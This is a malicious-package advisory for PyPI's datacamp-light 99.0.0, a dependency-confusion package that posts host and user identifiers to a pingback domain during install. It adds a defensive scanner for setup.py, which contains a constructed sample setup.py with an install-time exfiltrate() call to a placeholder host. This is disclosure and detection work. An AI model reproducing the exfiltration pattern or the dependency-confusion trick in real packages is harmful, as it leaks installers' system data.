MAL-2026-5868

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/datacamp-light/MAL-2026-5868.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5868
Published
2026-06-16T07:37:14Z
Modified
2026-06-16T16:16:48.805432619Z
Summary
Malicious code in datacamp-light (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b)

datacamp-light 99.0.0 impersonates DataCamp's internal package (name='datacamp-light', author='DataCamp', url='https://github.com/datacamp/datacamp-light', anomalous version 99.0.0 — the canonical dependency-confusion bait shape). setup.py defines an exfiltrate() function and invokes it unconditionally at top level, so it fires during pip install. The function collects hostname, current working directory, platform, Python version, and USER/USERNAME environment variables, JSON-encodes them, and POSTs them via urllib.request.urlopen to https://z39gspa3.pingback.sh/c. Any installer whose resolver picks up this public artifact (the intent of the 99.0.0 version pin) leaks host and user identifiers to the pingback domain. Even though the package self-labels as a 'PoC,' the published artifact actively phones home from any machine that installs it.

Source: kam193 (932d64d5c0af79e8508b244379f54edc48fea625d9becd455912980e30dd146e)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.
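Both install-time hooks described above (a network-reaching function invoked unconditionally at the top of setup.py, and a cmdclass override of the install command) can be spotted statically before a build ever runs. The following scanner is an added example, not code from the advisory sources or the package; the sample setup.py it parses is constructed to mirror the described shape, and the URL in it is a placeholder.

```python
import ast

# Constructed sample (not the real setup.py): a network helper invoked unconditionally at module level.
SAMPLE_SETUP_PY = '''
import socket, urllib.request
from setuptools import setup
def exfiltrate():
    urllib.request.urlopen("https://example.invalid/c", data=socket.gethostname().encode())  # placeholder URL
exfiltrate()
setup(name="datacamp-light", version="99.0.0")
'''

# Dotted names that perform network I/O; extend for the libraries you care about.
NETWORK_CALLS = {"urllib.request.urlopen", "requests.get", "requests.post", "socket.create_connection"}

def _dotted(node):
    """Flatten a Name/Attribute chain such as urllib.request.urlopen to a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def install_time_network_calls(source):
    """Module-level calls that reach the network, directly or via a local function.
    Anything here runs when pip builds the sdist, before the package is ever imported."""
    tree = ast.parse(source)
    networking_funcs = {fn.name for fn in tree.body if isinstance(fn, ast.FunctionDef)
                        and any(isinstance(s, ast.Call) and _dotted(s.func) in NETWORK_CALLS
                                for s in ast.walk(fn))}
    flagged = set()
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            name = _dotted(stmt.value.func)
            if name in NETWORK_CALLS or name in networking_funcs:
                flagged.add(name)
    return sorted(flagged)

def overrides_install_command(source):
    """True when setup(...) passes cmdclass={'install': ...}, the other install-time hook."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func) == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict) and any(
                        isinstance(k, ast.Constant) and k.value == "install" for k in kw.value.keys):
                    return True
    return False
```

Run it over every setup.py in an sdist before it reaches a build host; a non-empty result from either function is a reason to quarantine the artifact rather than install it.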

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "pypi/GENERIC-standard-pypi-install-pentest/datacamp-light",
            "import_time": "2026-06-16T08:06:34.14051001Z",
            "versions": [
                "99.0.0"
            ],
            "source": "kam193",
            "modified_time": "2026-06-16T07:37:14.136625Z",
            "sha256": "932d64d5c0af79e8508b244379f54edc48fea625d9becd455912980e30dd146e"
        },
        {
            "id": "IN-MAL-2026-006751",
            "import_time": "2026-06-16T16:06:32.945994809Z",
            "versions": [
                "99.0.0"
            ],
            "source": "amazon-inspector",
            "sha256": "234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b",
            "modified_time": "2026-06-16T14:38:27Z"
        }
    ]
}
References
Credits

Affected packages

Package: PyPI / datacamp-light

Affected ranges: 99.*

Affected versions: 99.0.0

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/datacamp-light/MAL-2026-5868.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "datacamp_light-99.0.0.tar.gz",
            "hashes": {
                "blake2b_256": "741bb9dbeb0d166a742444b0a6cd86f13916b067dc3466dc47655f728c40df54",
                "md5": "7d47fe8877ca21e55e07c90059d77d29",
                "sha256": "7491fa48ad8c21f25e1dbb6c199f2fdc806c0f630c311a2e04e0125b014e1ca3"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "setup.py",
            "sha256": "4285235740ca60c014f0d9033e31dffcb4eda8e73eaaceff33b6a6e772920db3",
            "tlsh": "f2214156d8216c63274664a48c1b51253727f6072e02f8ac3e8c82581fae2be03b4358"
        }
    ]
}